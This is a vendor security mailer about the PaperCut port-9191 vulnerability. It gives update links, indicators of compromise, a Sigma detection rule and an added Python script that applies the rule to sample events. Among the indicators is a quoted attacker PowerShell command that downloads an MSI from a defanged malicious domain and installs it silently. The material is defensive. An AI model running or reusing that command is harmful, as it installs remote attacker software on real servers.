[Marketing] PaperCut Vulnerability

Marketing Department mailer at tbsit360.com
Wed Apr 26 19:04:17 UTC 2023


From TBS - Today's Business Solutions


Dear Valued TBS Customer,

We have been made aware of a vulnerability within PaperCut. This vulnerability affects all PaperCut servers through port 9191. Servers that have port 9191 exposed to the outside world are EXTREMELY vulnerable.

We wanted to share the attached documents with you: one from PaperCut, and a useful article that provides insight into this issue.
Download Articles PDF (https://mcusercontent.com/bf77172ea6b10a18f6669778a/files/3a9f97a6-fa72-482d-c96e-4fd808de1f97/Papercut_Article.01.pdf)

Please contact our support team to schedule the update. Anyone running PaperCut Version 19 or prior is required to contact our support team.

To email: Helpdesk at tbsit360.com (mailto:helpdesk at tbsit360.com?subject=PaperCut%20Vulnerabilty&body=null)  or call us (630) 537-1370 ext. 2

The links below from PaperCut are for anyone who would like to perform the update themselves.

Links to Download:


PaperCut Version 22:

https://cdn.papercut.com/web/products/ng-mf/installers/mf/22.x/pcmf-setup-22.0.10.65997.exe


PaperCut Version 21:

https://cdn.papercut.com/web/products/ng-mf/installers/mf/21.x/pcmf-setup-21.2.11.65657.exe


PaperCut Version 20:

https://cdn.papercut.com/web/products/ng-mf/installers/mf/20.x/pcmf-setup-20.1.7.65660.exe


Anyone running PaperCut Version 19 or prior is required to contact our support team.

IMPORTANT: Make sure to back up your PaperCut database before any installation above.

How do I know if my server has been exploited?

We currently recommend looking for the following Indicators of Compromise to determine if it is likely that the vulnerability has been used to install malware on the system. Depending on your systems, logging and endpoint protection software you may be able to detect the following.

• If your security software has raised any alerts or warnings

• If you see suspicious PaperCut MF application log entries, i.e.:

    • User “admin” logs into the administration interface
    • Admin user “admin” modified the print script on the printer
    • User “admin” updated the config key “…”
    • User “[setup-wizard]” modified a config key

• Domains in DNS or web proxy logs:


• SHA256 hashes of files on local system:

    • setup.msi f9947c5763542b3119788923977153ff8ca807a2e535e6ab28fc42641983aabb
    • ld.txt c0f8aeeb2d11c6e751ee87c40ee609aceb1c1036706a5af0d3d78738b6cc4125

• PowerShell scripts with content similar to:

```
cmd /c "powershell.exe -nop -w hidden
Invoke-WebRequest 'hXXp://upd488[.]windowservicecemter[.]com/download/setup.msi'
-OutFile 'setup.msi' "
cmd /c "msiexec /i setup.msi /qn  IntegratorLogin=fimaribahundqf[AT]gmx[.]com CompanyId=1"
```

• Detection via YARA Rule on SIEM:

```
title: PaperCut MF/NG Vulnerability
authors: Huntress DE&TH Team
description: Detects suspicious code execution from vulnerable PaperCut versions MF and NG
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    ParentImage|endswith: \\pc-app.exe
    Image|endswith:
      - \\cmd.exe
      - \\powershell.exe
  condition: selection
level: high
falsepositives:
  - Expected admin activity
```
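
The selection logic of the rule above (which is written in Sigma rule syntax), applied to exported process-creation events. This is an added example, not part of the original email or of PaperCut's or Huntress's material. It assumes events exported as one JSON object per line with Sysmon-style `ParentImage` and `Image` fields; the sample events, host names and paths are constructed.

```python
import json

# Suffixes copied from the rule's `selection` block (one literal backslash each).
PARENT_SUFFIX = "\\pc-app.exe"
CHILD_SUFFIXES = ("\\cmd.exe", "\\powershell.exe")


def matches_rule(event):
    """True when an event satisfies both fields of `selection`.

    Sigma string matching is case-insensitive, so values are lowered first.
    An event missing either field never matches.
    """
    parent = str(event.get("ParentImage") or "").lower()
    image = str(event.get("Image") or "").lower()
    return parent.endswith(PARENT_SUFFIX) and image.endswith(CHILD_SUFFIXES)


def scan(json_lines):
    """Return matching events from newline-delimited JSON, skipping bad lines."""
    hits = []
    for line in json_lines.splitlines():
        if not line.strip():
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # truncated or non-JSON line in the export
        if isinstance(event, dict) and matches_rule(event):
            hits.append(event)
    return hits


# Constructed sample events, not real telemetry. Host names and paths are assumptions.
SAMPLE = r"""
{"Host":"PRINT01","ParentImage":"C:\\Program Files\\PaperCut MF\\server\\bin\\win\\pc-app.exe","Image":"C:\\Windows\\System32\\cmd.exe"}
{"Host":"PRINT02","ParentImage":"D:\\PAPERCUT\\SERVER\\BIN\\WIN\\PC-APP.EXE","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShell.exe"}
{"Host":"WKS07","ParentImage":"C:\\Windows\\explorer.exe","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"}
{"Host":"WKS09","ParentImage":"C:\\Tools\\notpc-app.exe","Image":"C:\\Windows\\System32\\cmd.exe"}
{"Host":"PRINT01","Image":"C:\\Windows\\System32\\cmd.exe"}
{"Host":"PRINT01","ParentImage":
"""

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(f'{hit["Host"]}: {hit["ParentImage"]} -> {hit["Image"]}')
```

The leading backslash in each suffix is what keeps a binary such as `notpc-app.exe` from matching, and the rule's own `falsepositives` entry still applies: a hit needs to be checked against expected admin activity on that server.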

If you suspect that your server has been compromised, we recommend taking server backups, then wiping the Application Server, and rebuilding the Application Server and restoring the database from a ‘safe’ backup point prior to when you discovered any suspicious behavior.

Copyright (C) 2023 TBS - Today's Business Solutions. All rights reserved.